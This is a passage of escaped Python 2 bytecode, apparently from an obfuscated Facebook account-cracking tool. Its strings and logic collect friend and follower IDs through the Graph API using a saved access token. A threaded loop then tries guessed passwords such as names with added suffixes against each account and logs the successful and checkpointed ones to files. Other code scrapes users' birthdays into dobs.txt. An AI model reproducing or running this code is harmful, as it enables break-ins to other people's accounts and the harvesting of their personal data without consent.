onlyi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00s\xce\x00\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\xa5\x00t\x01\x00j\x02\x00d\x02\x00|\x02\x00\x17d\x03\x00\x17t\x03\x00\x17d\x04\x00t\x04\x00\x83\x01\x01j\x05\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00\x83\x01\x00}\x05\x00|\x05\x00d\x05\x00\x19}\x06\x00d\x06\x00|\x02\x00\x17d\x07\x00\x17|\x03\x00\x17d\x08\x00\x17|\x06\x00\x17d\t\x00\x17GHt\x08\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00|\x03\x00d\x08\x00\x17|\x02\x00\x17d\x08\x00\x17|\x06\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00t\x0c\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\r\x00\x00\x00NR@\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00t\x08\x00\x00\x00birthdays\x08\x00\x00\x00\x1b[1;32m s\t\x00\x00\x00 \x1b[1;30m s\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x08\x00\x00\x00dobs.txtRH\x00\x00\x00s\x01\x00\x00\x00\n(\r\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x06\x00\x00\x00number(\x08\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00R*\x00\x00\x00RV\x00\x00\x00t\x01\x00\x00\x00yt\x03\x00\x00\x00nmb(\x01\x00\x00\x00t\x03\x00\x00\x00nms(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\x19\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01$\x01\x0f\x01\n\x01\x1d\x01\x0f\x01!\x01\n\x01\x11\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has 
completeds\x14\x00\x00\x00\x1b[1;93mTotal DOB : s\x16\x00\x00\x00\n Press enter to back (\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00t\x03\x00\x00\x00dobR\x0f\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x01\x00\x00\x00Rt\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ro\x00\x00\x00\xd6\x01\x00\x00s\x98\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\t\x01\x05\x01\n\x01\x0b\x01!\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x02%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01\x07\x01\x15\x01\x05\x01\x05\x01\x05\x01\t\x01\x05\x02\x0f\x10\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHt\r\x00d\x08\x00\x83\x01\x00}\x00\x00t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01yA\x00t\x0e\x00j\x0f\x00d\n\x00|\x00\x00\x17d\x0b\x00\x17t\x02\x00\x17d\x0c\x00t\x10\x00\x83\x01\x01j\x11\x00}\x01\x00t\x12\x00j\x13\x00|\x01\x00\x83\x01\x00}\x02\x00|\x02\x00d\r\x00\x19}\x03\x00Wna\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rY\x01\x01\x01\x01t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x0e\x00GHd\x05\x00GHt\r\x00d\x0f\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x10\x00|\x00\x00\x17GHd\x11\x00|\x03\x00\x17GHd\x05\x00GHd\x12\x00d\x13\x00\x14GHd\x05\x00GHt\x15\x00\x83\x00\x00\x01d\x00\x00S(\x14\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0e\x00\x00\x00Find DOB Of IDs\x0f\x00\x00\x00 Put id/user : s$\x00\x00\x00echo -e "\t Finding DOB " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00Rp\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93mDOB not founds\x1a\x00\x00\x00 Press enter to try again s\x14\x00\x00\x00\x1b[1;93mAccount ID : s\r\x00\x00\x00\x1b[1;93mDOB : i/\x00\x00\x00RE\x00\x00\x00(\x16\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00Rd\x00\x00\x00t\x04\x00\x00\x00conf(\x04\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00Rk\x00\x00\x00t\x04\x00\x00\x00dobs(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ru\x00\x00\x005\x02\x00\x00sR\x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\r\x01\x03\x01$\x01\x0f\x01\x0e\x01\x13\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\t\x01\t\x01\x05\x01\t\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x07\x00t\x03\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;93mDo you want to find again (y/n) Rr\x00\x00\x00t\x01\x00\x00\x00n(\x04\x00\x00\x00R\x0e\x00\x00\x00Ru\x00\x00\x00Rd\x00\x00\x00R\x0f\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00ol(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rv\x00\x00\x00`\x02\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x11\x00t\x0f\x00\x17d\x12\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s.\x00\x00\x00\t \x1b[1;31mTurn on mobile data OR wifi\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again i/\x00\x00\x00RE\x00\x00\x00s\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In Users\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x1d\x00\x00\x00\x1b[1;93m[3] Return method menus\x11\x00\x00\x00\x1b[1;93m[4] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R<\x00\x00\x00R\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00l_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R>\x00\x00\x00R?\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x10\x00\x00\x00h\x02\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\t\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00sq\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xA\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\xf0\x01|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x17\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\x18\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\x9f\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03WnN\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1d\x00t\x12\x00\x17d\x1e\x00\x17t\x13\x00\x17GHd\x04\x00GHt\x14\x00\x83\x00\x00\x0
1d\x1f\x00t\x15\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x17\x00j\x18\x00d \x00\x83\x01\x00\x01d!\x00GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d$\x00\x86\x00\x00}\n\x00t\x19\x00d%\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1a\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHd&\x00GHd\'\x00t\x15\x00t\x16\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17d(\x00\x17t\x15\x00t\x16\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHt\x00\x00d)\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(*\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x10\x00\x00\x00 Put Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x0e\x00\x00\x00Target user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s\x0f\x00\x00\x00 Put Id/user : R.\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x16\x00\x00\x00\n Press enter to back s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00\x1b[1;93mSILAHKAN DITUNGGU process is running in backgroundi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sh\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y?\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xc2\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n\x97\x06d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r)\x01d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n0\x06|\x03\x00d\x11\x00\x17}\t\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xcd\x01d\x07\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n\x8c\x05d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r4\x02d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n%\x05|\x03\x00d\x12\x00\x17}\n\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\n\x
00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xd8\x02d\x07\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x81\x04d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r?\x03d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x1a\x04|\x03\x00d\x13\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xe3\x03d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01nv\x03d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rJ\x04d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01n\x0f\x03d\x14\x00}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xea\x04d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01no\x02d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rQ\x05d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01n\x08\x02d\x15\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17\x83\x01\x00j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xeb\x05d\x07\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01nn\x01d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rR\x06d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01n\x07\x01d\x16\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xf2\x06d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\
